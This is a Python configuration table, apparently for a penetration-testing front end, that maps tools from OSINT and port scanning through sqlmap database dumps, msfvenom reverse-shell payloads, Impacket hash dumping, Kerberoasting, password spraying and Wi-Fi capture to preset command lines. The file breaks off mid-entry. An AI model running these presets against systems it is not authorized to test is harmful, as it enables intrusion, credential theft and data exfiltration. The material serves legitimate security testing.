TOOLS = {
    # ---------------- OSINT ----------------
    "whois": {
        "name": "Whois",
        "binary": "whois",
        "desc": "Registrar info, owner, domain registration dates",
        "category": "osint",
        "output_dir": "osint",
        "requires_root": False,
        "presets": [
            {"label": "Whois lookup", "cmd": ["whois", "{host}"], "output": "whois"},
        ],
    },
    "dig": {
        "name": "Dig",
        "binary": "dig",
        "desc": "DNS query: A, MX, TXT, NS, AXFR, etc.",
        "category": "osint",
        "output_dir": "osint",
        "requires_root": False,
        "presets": [
            {"label": "A record (domain IP)",                      "cmd": ["dig", "{host}", "A", "+short"],    "output": "dig_a"},
            {"label": "MX record (mail servers)",                  "cmd": ["dig", "{host}", "MX", "+short"],   "output": "dig_mx"},
            {"label": "TXT record (SPF, DMARC, tokens)",           "cmd": ["dig", "{host}", "TXT", "+short"],  "output": "dig_txt"},
            {"label": "NS record (nameservers)",                   "cmd": ["dig", "{host}", "NS", "+short"],   "output": "dig_ns"},
            {"label": "AXFR zone transfer (attempt)",              "cmd": ["dig", "{host}", "AXFR"],           "output": "dig_axfr"},
            {"label": "All records",                               "cmd": ["dig", "{host}", "ANY"],             "output": "dig_any"},
        ],
    },
    "subfinder": {
        "name": "Subfinder",
        "binary": "subfinder",
        "desc": "Passive subdomain enumeration via OSINT sources",
        "category": "osint",
        "output_dir": "osint",
        "requires_root": False,
        "presets": [
            {"label": "Passive subdomains (fast)",                "cmd": ["subfinder", "-d", "{host}", "-silent"], "output": "subfinder"},
            {"label": "All sources subdomains (exhaustive)",      "cmd": ["subfinder", "-d", "{host}", "-all", "-silent"], "output": "subfinder_all"},
        ],
    },
    "amass": {
        "name": "Amass",
        "binary": "amass",
        "desc": "Attack surface mapping (subdomains, ASN, IPs)",
        "category": "osint",
        "output_dir": "osint",
        "requires_root": False,
        "presets": [
            {"label": "Passive enumeration (no noise)",    "cmd": ["amass", "enum", "-passive", "-d", "{host}"], "output": "amass_passive"},
            {"label": "Active enumeration (DNS bruteforce)", "cmd": ["amass", "enum", "-active", "-d", "{host}"], "output": "amass_active"},
        ],
    },
    "dnsrecon": {
        "name": "DNSRecon",
        "binary": "dnsrecon",
        "desc": "DNS reconnaissance: zones, bruteforce, transfers, reverse lookup",
        "category": "osint",
        "output_dir": "osint",
        "requires_root": False,
        # Validates the binary — rejects the broken Arch system package (python-dnsrecon 1.5.1)
        # which crashes on Python 3.12+ (urllib.request.FancyURLopener removed)
        "help_contains_any": ["dnsrecon", "DNSRecon"],
        "presets": [
            {"label": "Standard scan (A/MX/NS/SOA/TXT)",         "cmd": ["dnsrecon", "-d", "{host}"], "output": "dnsrecon_std"},
            {"label": "Subdomain bruteforce with wordlist",      "cmd": ["dnsrecon", "-d", "{host}", "-D", "{wordlist}", "-t", "brt"], "output": "dnsrecon_brute", "wordlist": True},
        ],
    },
    "theharvester": {
        "name": "theHarvester",
        "binary": "theHarvester",
        "desc": "Gathers emails, names, IPs, subdomains via search engines",
        "category": "osint",
        "output_dir": "osint",
        "requires_root": False,
        "presets": [
            {"label": "All sources (slow but complete)",         "cmd": ["theHarvester", "-d", "{host}", "-b", "all"],           "output": "theharvester_all"},
            {"label": "Google + crtsh + virustotal",             "cmd": ["theHarvester", "-d", "{host}", "-b", "google,crtsh,virustotal"], "output": "theharvester_passive"},
            {"label": "Google only",                             "cmd": ["theHarvester", "-d", "{host}", "-b", "google"],       "output": "theharvester_google"},
        ],
    },
    "shodan": {
        "name": "Shodan CLI",
        "binary": "shodan",
        "desc": "Search for hosts exposed on the internet (requires API key: shodan init <KEY>)",
        "category": "osint",
        "output_dir": "osint",
        "requires_root": False,
        "presets": [
            {"label": "Host lookup (ports, services, vulns)",    "cmd": ["shodan", "host", "{host}"], "output": "shodan_host"},
        ],
    },

    # ---------------- RECON ----------------
    "nmap": {
        "name": "Nmap",
        "binary": "nmap",
        "desc": "Port and service scanner, OS detection, NSE scripts",
        "category": "recon",
        "output_dir": "recon",
        "requires_root": False,
        "presets": [
            {"label": "Quick scan — top 1000 ports",                       "cmd": ["nmap", "-T4", "-F", "{host}"],                           "output": "nmap_rapide"},
            {"label": "Full scan — all ports (slow)",                      "cmd": ["nmap", "-T4", "-p-", "{host}"],                          "output": "nmap_complet"},
            {"label": "Aggressive scan — OS + services + scripts",         "cmd": ["nmap", "-T4", "-A", "{host}"],                           "output": "nmap_agressif"},
            {"label": "OS detection + service versions",                   "cmd": ["nmap", "-T4", "-sV", "-O", "{host}"],                    "output": "nmap_os", "requires_root": True},
            {"label": "Vulnerability scan (NSE vuln scripts)",             "cmd": ["nmap", "-T4", "--script", "vuln", "{host}"],             "output": "nmap_vuln"},
            {"label": "Stealth SYN scan — slow, discreet",                 "cmd": ["nmap", "-sS", "-T2", "{host}"],                          "output": "nmap_furtif",    "requires_root": True},
            {"label": "T3 — Normal timing (balanced)",                     "cmd": ["nmap", "-T3", "-F", "{host}"],                           "output": "nmap_t3"},
            {"label": "T1 — Paranoid (very slow, minimal noise)",          "cmd": ["nmap", "-sS", "-T1", "-F", "{host}"],                    "output": "nmap_t1",        "requires_root": True},
            {"label": "UDP — top 100 ports",                               "cmd": ["nmap", "-sU", "--top-ports", "100", "{host}"],           "output": "nmap_udp",       "requires_root": True},
            {"label": "Common ports — 22,80,443,445,3389,8080",            "cmd": ["nmap", "-p", "22,80,443,445,3389,8080", "-sV", "{host}"],"output": "nmap_common"},
            {"label": "Service versions only (no OS)",                     "cmd": ["nmap", "-T4", "-sV", "{host}"],                          "output": "nmap_svcver"},
            {"label": "NSE auth scripts",                                  "cmd": ["nmap", "-T4", "--script", "auth", "{host}"],             "output": "nmap_auth"},
            {"label": "NSE discovery scripts",                             "cmd": ["nmap", "-T4", "--script", "discovery", "{host}"],        "output": "nmap_discovery"},
        ],
    },
    "rustscan": {
        "name": "RustScan",
        "binary": "rustscan",
        "desc": "Ultra-fast port scanner (Rust), passes the result to nmap",
        "category": "recon",
        "output_dir": "recon",
        "requires_root": False,
        "presets": [
            {"label": "Quick scan + service detection",    "cmd": ["rustscan", "-a", "{host}", "--", "-sV"],         "output": "rustscan_rapide"},
            {"label": "All ports 1-65535",                 "cmd": ["rustscan", "-a", "{host}", "-p", "1-65535"],      "output": "rustscan_all"},
            {"label": "With NSE scripts (sC + sV)",        "cmd": ["rustscan", "-a", "{host}", "--", "-sC", "-sV"],              "output": "rustscan_scripts"},
            {"label": "Fast — rate 5000, top 1000 ports", "cmd": ["rustscan", "-a", "{host}", "--rate", "5000", "-p", "1-1000"],  "output": "rustscan_fast"},
            {"label": "Stealth — rate 500, all ports",    "cmd": ["rustscan", "-a", "{host}", "--rate", "500",  "-p", "1-65535"], "output": "rustscan_stealth"},
        ],
    },
    "masscan": {
        "name": "Masscan",
        "binary": "masscan",
        "desc": "Massively parallel port scanner, scans the internet in minutes",
        "category": "recon",
        "output_dir": "recon",
        "requires_root": True,
        "requires_ip": True,
        "presets": [
            {"label": "Top 1000 ports (rate 1000 pps)",    "cmd": ["masscan", "{host}", "-p1-1000", "--rate=1000"],   "output": "masscan_top"},
            {"label": "Full scan (rate 5000 pps)",          "cmd": ["masscan", "{host}", "-p0-65535", "--rate=5000"], "output": "masscan_all"},
        ],
    },
    "naabu": {
        "name": "Naabu",
        "binary": "naabu",
        "desc": "Fast port scanner by ProjectDiscovery, integrates well with httpx",
        "category": "recon",
        "output_dir": "recon",
        "requires_root": False,
        "presets": [
            {"label": "Quick scan (common ports)",    "cmd": ["naabu", "-host", "{host}", "-silent"], "output": "naabu_rapide"},
            {"label": "All ports",                    "cmd": ["naabu", "-host", "{host}", "-port", "-", "-silent"], "output": "naabu_all"},
        ],
    },

    # ---------------- WEB ENUM ----------------
    "gobuster": {
        "name": "Gobuster",
        "binary": "gobuster",
        "desc": "Bruteforce of directories, DNS subdomains and vhosts via wordlist",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Dir — common wordlist (fast)",      "cmd": ["gobuster", "dir", "-u", "{url}", "-w", "{wordlist}"],           "output": "gobuster_dir",  "wordlist": True},
            {"label": "Dir — large wordlist (exhaustive)", "cmd": ["gobuster", "dir", "-u", "{url}", "-w", "{wordlist}", "-x", "php,html,js"], "output": "gobuster_dir_ext", "wordlist": True},
            {"label": "DNS — subdomains",                  "cmd": ["gobuster", "dns", "-d", "{host}", "-w", "{wordlist}"],          "output": "gobuster_dns",  "wordlist": True},
            {"label": "VHost — virtual hosts",                            "cmd": ["gobuster", "vhost", "-u", "{url}", "-w", "{wordlist}"],                              "output": "gobuster_vhost",     "wordlist": True},
            {"label": "Dir — with extensions (php,html,js,txt)",       "cmd": ["gobuster", "dir",  "-u", "{url}", "-w", "{wordlist}", "-x", "php,html,js,txt"],     "output": "gobuster_dir_ext2",  "wordlist": True},
            {"label": "Dir — filter 404 responses",                    "cmd": ["gobuster", "dir",  "-u", "{url}", "-w", "{wordlist}", "-b", "404"],                  "output": "gobuster_no404",     "wordlist": True},
            {"label": "Dir — with session cookie",                     "cmd": ["gobuster", "dir",  "-u", "{url}", "-w", "{wordlist}", "-c", "{cookie}"],             "output": "gobuster_cookie",    "wordlist": True, "prompt": {"cookie": "Cookie string (e.g. session=abc123)"}},
        ],
    },
    "ffuf": {
        "name": "ffuf",
        "binary": "ffuf",
        "desc": "Fast web fuzzer: directories, parameters, headers, HTTP methods",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Directory fuzzing",                 "cmd": ["ffuf", "-u", "{url}/FUZZ", "-w", "{wordlist}"],                          "output": "ffuf_dir",   "wordlist": True},
            {"label": "GET parameter fuzzing",             "cmd": ["ffuf", "-u", "{url}?FUZZ=test", "-w", "{wordlist}"],                     "output": "ffuf_param", "wordlist": True},
            {"label": "Fuzzing with status 200 filter",    "cmd": ["ffuf", "-u", "{url}/FUZZ", "-w", "{wordlist}", "-mc", "200"],            "output": "ffuf_200",   "wordlist": True},
            {"label": "Subdomain fuzzing (vhost)",        "cmd": ["ffuf", "-u", "{url}", "-H", "Host: FUZZ.{host}", "-w", "{wordlist}"],                                                                    "output": "ffuf_vhost",   "wordlist": True},
            {"label": "POST body fuzzing",               "cmd": ["ffuf", "-u", "{url}", "-X", "POST", "-d", "FUZZ", "-H", "Content-Type: application/x-www-form-urlencoded", "-w", "{wordlist}"], "output": "ffuf_post",    "wordlist": True},
            {"label": "Header fuzzing",                  "cmd": ["ffuf", "-u", "{url}", "-H", "FUZZ: test", "-w", "{wordlist}"],                                                                   "output": "ffuf_header",  "wordlist": True},
            {"label": "Filter by response size",         "cmd": ["ffuf", "-u", "{url}/FUZZ", "-w", "{wordlist}", "-fs", "{size}"],                                                                 "output": "ffuf_size",    "wordlist": True, "prompt": {"size": "Filter response size (bytes, e.g. 1234)"}},
        ],
    },
    "httpx": {
        "name": "httpx",
        "binary": "httpx",
        "binary_alternatives": ["httpx-toolkit"],
        "help_contains_any": ["projectdiscovery", "-title", "-tech-detect"],
        "desc": "Fast HTTP probe: title, technologies, status codes, headers",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Simple URL probe",                          "cmd": ["httpx", "-u", "{url}", "-silent"],                                    "output": "httpx_probe"},
            {"label": "Probe with title, tech, status",            "cmd": ["httpx", "-u", "{url}", "-title", "-tech-detect", "-status-code"],      "output": "httpx_info"},
            {"label": "Probe with headers and screenshot (text)",  "cmd": ["httpx", "-u", "{url}", "-include-response-header", "-status-code"],    "output": "httpx_headers"},
        ],
    },
    "wafw00f": {
        "name": "wafw00f",
        "binary": "wafw00f",
        "desc": "Detection and identification of web application firewalls (WAF)",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Simple WAF detection",    "cmd": ["wafw00f", "{url}"],       "output": "wafw00f"},
            {"label": "Verbose detection",        "cmd": ["wafw00f", "{url}", "-v"], "output": "wafw00f_verbose"},
        ],
    },
    "whatweb": {
        "name": "WhatWeb",
        "binary": "whatweb",
        "desc": "Web fingerprinting: CMS, frameworks, servers, plugins, versions",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Fast fingerprinting (level 1)",        "cmd": ["whatweb", "{url}"],             "output": "whatweb_rapide"},
            {"label": "Aggressive fingerprinting (level 3)",  "cmd": ["whatweb", "-a", "3", "{url}"],  "output": "whatweb_agressif"},
        ],
    },
    "katana": {
        "name": "Katana",
        "binary": "katana",
        "desc": "Modern web crawler: discovers endpoints, forms, JS, APIs",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Simple crawl (depth 1)",                 "cmd": ["katana", "-u", "{url}"],                      "output": "katana_simple"},
            {"label": "Deep crawl (depth 3)",                   "cmd": ["katana", "-u", "{url}", "-depth", "3"],        "output": "katana_profond"},
            {"label": "Crawl with JavaScript analysis",         "cmd": ["katana", "-u", "{url}", "-js-crawl"],          "output": "katana_js"},
        ],
    },
    "gau": {
        "name": "gau",
        "binary": "gau",
        "desc": "Fetches all known URLs from Wayback, Common Crawl, OTX",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Historical URLs of the domain",             "cmd": ["gau", "{host}"],            "output": "gau"},
            {"label": "URLs + subdomains included",                "cmd": ["gau", "--subs", "{host}"],  "output": "gau_subs"},
        ],
    },
    "waybackurls": {
        "name": "waybackurls",
        "binary": "waybackurls",
        "desc": "Extracts URLs archived by the Wayback Machine (Internet Archive)",
        "category": "web_enum",
        "output_dir": "web_enum",
        "requires_root": False,
        "presets": [
            {"label": "Wayback Machine URLs", "cmd": ["waybackurls", "{host}"], "output": "waybackurls"},
        ],
    },

    # ---------------- VULNSCAN ----------------
    "nikto": {
        "name": "Nikto",
        "binary": "nikto",
        "desc": "Web vulnerability scanner: misconfigurations, dangerous files, CVEs",
        "category": "vulnscan",
        "output_dir": "vulnscan",
        "requires_root": False,
        "presets": [
            {"label": "Standard scan",         "cmd": ["nikto", "-h", "{url}"],              "output": "nikto_std"},
            {"label": "Full scan (all checks)",     "cmd": ["nikto", "-h", "{url}", "-C", "all"], "output": "nikto_complet"},
        ],
    },
    "nuclei": {
        "name": "Nuclei",
        "binary": "nuclei",
        "desc": "Template-based vulnerability scanner: CVEs, misconfigs, exposures",
        "category": "vulnscan",
        "output_dir": "vulnscan",
        "requires_root": False,
        "presets": [
            {"label": "Default templates (all)",              "cmd": ["nuclei", "-u", "{url}"],                                  "output": "nuclei_default"},
            {"label": "CVEs only",                             "cmd": ["nuclei", "-u", "{url}", "-tags", "cve"],                  "output": "nuclei_cve"},
            {"label": "High and critical severity only",      "cmd": ["nuclei", "-u", "{url}", "-severity", "high,critical"],    "output": "nuclei_high"},
            {"label": "Misconfigurations",                     "cmd": ["nuclei", "-u", "{url}", "-tags", "misconfiguration"],     "output": "nuclei_misconfig"},
            {"label": "Exposures (template dir)",              "cmd": ["nuclei", "-u", "{url}", "-t", "exposures"],              "output": "nuclei_exposures"},
            {"label": "Network templates",                     "cmd": ["nuclei", "-u", "{url}", "-t", "network"],                "output": "nuclei_network"},
        ],
    },
    "wpscan": {
        "name": "WPScan",
        "binary": "wpscan",
        "desc": "WordPress scanner: vulnerable plugins, themes, users, configs",
        "category": "vulnscan",
        "output_dir": "vulnscan",
        "requires_root": False,
        "presets": [
            {"label": "Full enumeration (plugins, themes, users)",        "cmd": ["wpscan", "--url", "{url}", "-e", "ap,at,u"],                          "output": "wpscan_enum"},
            {"label": "User bruteforce with wordlist",                     "cmd": ["wpscan", "--url", "{url}", "-U", "admin", "-P", "{wordlist}"],         "output": "wpscan_brute", "wordlist": True},
        ],
    },
    "testssl.sh": {
        "name": "testssl.sh",
        "binary": "testssl",
        "binary_alternatives": ["testssl.sh"],
        "desc": "TLS/SSL analysis: protocols, ciphers, certificates, Heartbleed, POODLE",
        "category": "vulnscan",
        "output_dir": "vulnscan",
        "requires_root": False,
        "presets": [
            {"label": "Full TLS analysis",             "cmd": ["testssl", "{host}"],                     "output": "testssl_full"},
            {"label": "Heartbleed check",              "cmd": ["testssl", "--heartbleed", "{host}"],     "output": "testssl_heartbleed"},
            {"label": "Supported protocols only",      "cmd": ["testssl", "-p", "{host}"],               "output": "testssl_proto"},
        ],
    },
    "sslscan": {
        "name": "sslscan",
        "binary": "sslscan",
        "desc": "SSL/TLS scan: versions, weak ciphers, certificates",
        "category": "vulnscan",
        "output_dir": "vulnscan",
        "requires_root": False,
        "presets": [
            {"label": "Full SSL/TLS scan", "cmd": ["sslscan", "{host}"], "output": "sslscan"},
        ],
    },

    # ---------------- EXPLOITATION ----------------
    "sqlmap": {
        "name": "sqlmap",
        "binary": "sqlmap",
        "desc": "Automatic detection and exploitation of SQL injections",
        "category": "exploitation",
        "output_dir": "exploitation",
        "requires_root": False,
        "presets": [
            {"label": "Auto detection (batch mode, no interaction)",      "cmd": ["sqlmap", "-u", "{url}", "--batch"],                                                           "output": "sqlmap_detect"},
            {"label": "With session cookie",                               "cmd": ["sqlmap", "-u", "{url}", "--cookie", "{cookie}", "--batch"],                                  "output": "sqlmap_cookie", "prompt": {"cookie": "Cookie (e.g. session=abc123)"}},
            {"label": "List all databases",                                "cmd": ["sqlmap", "-u", "{url}", "--dbs", "--batch"],                                                  "output": "sqlmap_dbs"},
            {"label": "Dump the current database",                         "cmd": ["sqlmap", "-u", "{url}", "--dump", "--batch"],                                                 "output": "sqlmap_dump"},
            {"label": "With max level/risk (aggressive)",                  "cmd": ["sqlmap", "-u", "{url}", "--level=5", "--risk=3", "--batch"],                                  "output": "sqlmap_max"},
        ],
    },
    "xsstrike": {
        "name": "XSStrike",
        "binary": "xsstrike",
        "desc": "XSS detection and exploitation: DOM, reflected, stored, with crawl",
        "category": "exploitation",
        "output_dir": "exploitation",
        "requires_root": False,
        "presets": [
            {"label": "XSS scan on URL",          "cmd": ["xsstrike", "-u", "{url}"],            "output": "xsstrike_scan"},
            {"label": "Crawl + full XSS scan",    "cmd": ["xsstrike", "-u", "{url}", "--crawl"], "output": "xsstrike_crawl"},
        ],
    },
    "dalfox": {
        "name": "Dalfox",
        "binary": "dalfox",
        "desc": "Fast XSS scanner with advanced detection and WAF bypass",
        "category": "exploitation",
        "output_dir": "exploitation",
        "requires_root": False,
        "presets": [
            {"label": "XSS scan on URL", "cmd": ["dalfox", "url", "{url}"], "output": "dalfox_url"},
            {"label": "Scan with blind XSS callback", "cmd": ["dalfox", "url", "{url}", "--blind", "{callback}"], "output": "dalfox_blind", "prompt": {"callback": "Blind XSS callback URL"}},
        ],
    },
    "msfconsole": {
        "name": "Metasploit Console",
        "binary": "msfconsole",
        "desc": "Exploitation framework: modules, payloads, post-exploit (interactive)",
        "category": "exploitation",
        "output_dir": "exploitation",
        "requires_root": False,
        "interactive": True,
        "presets": [
            {"label": "Launch msfconsole (interactive terminal)", "cmd": ["msfconsole"], "output": None},
        ],
    },
    "msfvenom": {
        "name": "msfvenom",
        "binary": "msfvenom",
        "desc": "Payload generation: reverse shells, encodings, multiple formats",
        "category": "exploitation",
        "output_dir": "exploitation",
        "requires_root": False,
        "presets": [
            {"label": "Linux reverse shell (ELF x64)",   "cmd": ["msfvenom", "-p", "linux/x64/meterpreter/reverse_tcp", "LHOST={lhost}", "LPORT={lport}", "-f", "elf",  "-o", "{outfile}"], "output": None, "prompt": {"lhost": "LHOST (your IP)", "lport": "LPORT", "outfile": "Output file (e.g. shell.elf)"}},
            {"label": "Windows reverse shell (EXE x64)", "cmd": ["msfvenom", "-p", "windows/x64/meterpreter/reverse_tcp", "LHOST={lhost}", "LPORT={lport}", "-f", "exe", "-o", "{outfile}"], "output": None, "prompt": {"lhost": "LHOST (your IP)", "lport": "LPORT", "outfile": "Output file (e.g. shell.exe)"}},
            {"label": "PHP reverse shell",               "cmd": ["msfvenom", "-p", "php/meterpreter/reverse_tcp", "LHOST={lhost}", "LPORT={lport}", "-f", "raw",         "-o", "{outfile}"], "output": None, "prompt": {"lhost": "LHOST (your IP)", "lport": "LPORT", "outfile": "Output file (e.g. shell.php)"}},
            {"label": "Python reverse shell",            "cmd": ["msfvenom", "-p", "python/meterpreter/reverse_tcp", "LHOST={lhost}", "LPORT={lport}", "-f", "raw",      "-o", "{outfile}"], "output": None, "prompt": {"lhost": "LHOST (your IP)", "lport": "LPORT", "outfile": "Output file (e.g. shell.py)"}},
        ],
    },

    # ---------------- POST-EXPLOIT ----------------
    "linpeas.sh": {
        "name": "LinPEAS",
        "binary": "linpeas.sh",
        "desc": "Linux privilege enumeration: SUID, crons, configs, credentials",
        "category": "postexploit",
        "output_dir": "postexploit",
        "requires_root": False,
        "note": "LinPEAS must be downloaded manually: curl -Lo linpeas.sh https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh && chmod +x linpeas.sh && sudo mv linpeas.sh /usr/local/bin/",
        "presets": [
            {"label": "Run linpeas.sh", "cmd": ["linpeas.sh"], "output": "linpeas"},
        ],
    },
    "winpeas": {
        "name": "WinPEAS",
        "binary": "winpeas.exe",
        "desc": "Windows privilege enumeration — runs on the target",
        "category": "postexploit",
        "output_dir": "postexploit",
        "requires_root": False,
        "note": "WinPEAS runs on the Windows target. Download: https://github.com/peass-ng/PEASS-ng/releases",
        "presets": [],
    },
    "secretsdump.py": {
        "name": "Impacket secretsdump",
        "binary": "secretsdump.py",
        "binary_alternatives": ["impacket-secretsdump", "secretsdump"],
        "desc": "Extraction of NTLM hashes, LSA secrets, NTDS from Windows/AD",
        "category": "postexploit",
        "output_dir": "postexploit",
        "requires_root": False,
        "presets": [
            {"label": "Dump secrets (NTLM hash + LSA)", "cmd": ["secretsdump.py", "{domain}/{user}:{passwd}@{host}"], "output": "secretsdump", "prompt": {"domain": "Domain (e.g. CORP)", "user": "Username", "passwd": "Password"}},
        ],
    },
    "psexec.py": {
        "name": "Impacket psexec",
        "binary": "psexec.py",
        "binary_alternatives": ["impacket-psexec", "psexec"],
        "desc": "SYSTEM shell via SMB (requires local admin or accessible share)",
        "category": "postexploit",
        "output_dir": "postexploit",
        "requires_root": False,
        "interactive": True,
        "presets": [
            {"label": "SYSTEM shell via psexec", "cmd": ["psexec.py", "{domain}/{user}:{passwd}@{host}"], "output": None, "prompt": {"domain": "Domain", "user": "Username", "passwd": "Password"}},
        ],
    },
    "GetUserSPNs.py": {
        "name": "Impacket GetUserSPNs (Kerberoasting)",
        "binary": "GetUserSPNs.py",
        "binary_alternatives": ["impacket-GetUserSPNs", "GetUserSPNs"],
        "desc": "Kerberoasting: retrieves TGS tickets to crack passwords offline",
        "category": "postexploit",
        "output_dir": "postexploit",
        "requires_root": False,
        "presets": [
            {"label": "Kerberoasting — TGS tickets", "cmd": ["GetUserSPNs.py", "{domain}/{user}:{passwd}", "-dc-ip", "{host}", "-request"], "output": "kerberoast", "prompt": {"domain": "Domain", "user": "Username", "passwd": "Password"}},
        ],
    },
    "crackmapexec": {
        "name": "CrackMapExec / NetExec",
        "binary": "nxc",
        "binary_alternatives": ["crackmapexec"],
        "desc": "Windows/AD swiss-army knife: SMB enum, password spray, command exec",
        "category": "postexploit",
        "output_dir": "postexploit",
        "requires_root": False,
        "presets": [
            {"label": "SMB enum (host, domain, signing)",      "cmd": ["nxc", "smb", "{host}"],                                                         "output": "cme_smb"},
            {"label": "List shares",                            "cmd": ["nxc", "smb", "{host}", "-u", "{user}", "-p", "{passwd}", "--shares"],           "output": "cme_shares", "prompt": {"user": "Username", "passwd": "Password"}},
            {"label": "List AD users",                          "cmd": ["nxc", "smb", "{host}", "-u", "{user}", "-p", "{passwd}", "--users"],            "output": "cme_users",  "prompt": {"user": "Username", "passwd": "Password"}},
            {"label": "Password spray (user list)",             "cmd": ["nxc", "smb", "{host}", "-u", "{userfile}", "-p", "{passwd}", "--continue-on-success"], "output": "cme_spray", "prompt": {"userfile": "Users file", "passwd": "Password"}},
        ],
    },
    "bloodhound-python": {
        "name": "BloodHound-python",
        "binary": "bloodhound-python",
        "desc": "AD data collection for BloodHound: ACLs, GPOs, attack paths",
        "category": "postexploit",
        "output_dir": "postexploit",
        "requires_root": False,
        "presets": [
            {"label": "Full AD collection", "cmd": ["bloodhound-python", "-d", "{domain}", "-u", "{user}", "-p", "{passwd}", "-ns", "{host}", "-c", "all"], "output": "bloodhound", "prompt": {"domain": "Domain", "user": "Username", "passwd": "Password"}},
        ],
    },

    # ---------------- PASSWORDS ----------------
    "hashcat": {
        "name": "Hashcat",
        "binary": "hashcat",
        "desc": "GPU hash cracking: dictionary, bruteforce, rules, masks",
        "category": "passwords",
        "output_dir": "passwords",
        "requires_root": False,
        "presets": [
            {"label": "MD5 (-m 0) — dictionary",            "cmd": ["hashcat", "-m", "0",     "-a", "0", "{hashfile}", "{wordlist}"], "output": None, "wordlist": True, "prompt": {"hashfile": "Hash file (.txt)"}},
            {"label": "SHA1 (-m 100) — dictionary",          "cmd": ["hashcat", "-m", "100",   "-a", "0", "{hashfile}", "{wordlist}"], "output": None, "wordlist": True, "prompt": {"hashfile": "Hash file (.txt)"}},
            {"label": "SHA256 (-m 1400) — dictionary",       "cmd": ["hashcat", "-m", "1400",  "-a", "0", "{hashfile}", "{wordlist}"], "output": None, "wordlist": True, "prompt": {"hashfile": "Hash file (.txt)"}},
            {"label": "bcrypt (-m 3200) — dictionary",       "cmd": ["hashcat", "-m", "3200",  "-a", "0", "{hashfile}", "{wordlist}"], "output": None, "wordlist": True, "prompt": {"hashfile": "Hash file (.txt)"}},
            {"label": "NTLM (-m 1000) — dictionary",         "cmd": ["hashcat", "-m", "1000",  "-a", "0", "{hashfile}", "{wordlist}"], "output": None, "wordlist": True, "prompt": {"hashfile": "Hash file (.txt)"}},
            {"label": "JWT secret (-m 16500) — dictionary",  "cmd": ["hashcat", "-m", "16500", "-a", "0", "{hashfile}", "{wordlist}"], "output": None, "wordlist": True, "prompt": {"hashfile": "JWT file (.txt)"}},
            {"label": "WPA/WPA2 (-m 22000) — dictionary",    "cmd": ["hashcat", "-m", "22000", "-a", "0", "{hashfile}", "{wordlist}"], "output": None, "wordlist": True, "prompt": {"hashfile": "Capture file (.hccapx)"}},
            {"label": "Brute-force with mask (e.g. ?l?l?d?d)","cmd": ["hashcat", "-m", "0", "-a", "3", "{hashfile}", "{mask}"],    "output": None, "prompt": {"hashfile": "Hash file", "mask": "Mask (e.g. ?l?l?l?d?d?d = 3 letters + 3 digits)"}},
        ],
    },
    "john": {
        "name": "John the Ripper",
        "binary": "john",
        "desc": "CPU hash cracking: format auto-detection, dictionary, incremental",
        "category": "passwords",
        "output_dir": "passwords",
        "requires_root": False,
        "presets": [
            {"label": "Auto crack with wordlist (format auto-detected)", "cmd": ["john", "--wordlist={wordlist}", "{hashfile}"],                             "output": None, "wordlist": True, "prompt": {"hashfile": "Hash file"}},
            {"label": "Specific format + wordlist",                       "cmd": ["john", "--format={fmt}", "--wordlist={wordlist}", "{hashfile}"],           "output": None, "wordlist": True, "prompt": {"hashfile": "Hash file", "fmt": "Format (e.g. raw-md5, bcrypt, sha512crypt)"}},
            {"label": "Incremental mode (CPU bruteforce)",                "cmd": ["john", "--incremental", "{hashfile}"],                                     "output": None, "prompt": {"hashfile": "Hash file"}},
            {"label": "Show cracked passwords",                           "cmd": ["john", "--show", "{hashfile}"],                                            "output": "john_show", "prompt": {"hashfile": "Hash file"}},
        ],
    },
    "hydra": {
        "name": "Hydra",
        "binary": "hydra",
        "desc": "Bruteforce of network protocols: SSH, FTP, HTTP, SMB, RDP, etc.",
        "category": "passwords",
        "output_dir": "passwords",
        "requires_root": False,
        "presets": [
            {"label": "SSH — login/password bruteforce",   "cmd": ["hydra", "-l", "{user}", "-P", "{wordlist}", "{host}", "ssh"],                                          "output": "hydra_ssh",  "wordlist": True, "prompt": {"user": "Username (or -L for list)"}},
            {"label": "FTP — bruteforce",                  "cmd": ["hydra", "-l", "{user}", "-P", "{wordlist}", "{host}", "ftp"],                                          "output": "hydra_ftp",  "wordlist": True, "prompt": {"user": "Username"}},
            {"label": "HTTP POST form — bruteforce",       "cmd": ["hydra", "-l", "{user}", "-P", "{wordlist}", "{host}", "http-post-form", "{form}"],                     "output": "hydra_http", "wordlist": True, "prompt": {"user": "Username", "form": "Path:params:failure (e.g. /login:u=^USER^&p=^PASS^:F=wrong)"}},
            {"label": "RDP — bruteforce",                  "cmd": ["hydra", "-l", "{user}", "-P", "{wordlist}", "{host}", "rdp"],                                          "output": "hydra_rdp",  "wordlist": True, "prompt": {"user": "Username"}},
            {"label": "SMB — bruteforce",                  "cmd": ["hydra", "-l", "{user}", "-P", "{wordlist}", "{host}", "smb"],                                          "output": "hydra_smb",  "wordlist": True, "prompt": {"user": "Username"}},
        ],
    },

    # ---------------- WIRELESS ----------------
    "airmon-ng": {
        "name": "airmon-ng",
        "binary": "airmon-ng",
        "desc": "Enable/disable monitor mode on a Wi-Fi interface",
        "category": "wireless",
        "output_dir": "wireless",
        "requires_root": True,
        "interactive": True,
        "presets": [
            {"label": "Enable monitor mode (wlan0 → wlan0mon)",     "cmd": ["airmon-ng", "start", "{iface}"], "output": None, "prompt": {"iface": "Interface (e.g. wlan0)"}},
            {"label": "Disable monitor mode",                        "cmd": ["airmon-ng", "stop",  "{iface}"], "output": None, "prompt": {"iface": "Monitor interface (e.g. wlan0mon)"}},
            {"label": "Check for interfering processes",             "cmd": ["airmon-ng", "check"],            "output": None},
        ],
    },
    "airodump-ng": {
        "name": "airodump-ng",
        "binary": "airodump-ng",
        "desc": "Wi-Fi frame capture: network scan, WPA handshake capture",
        "category": "wireless",
        "output_dir": "wireless",
        "requires_root": True,
        "interactive": True,
        "presets": [
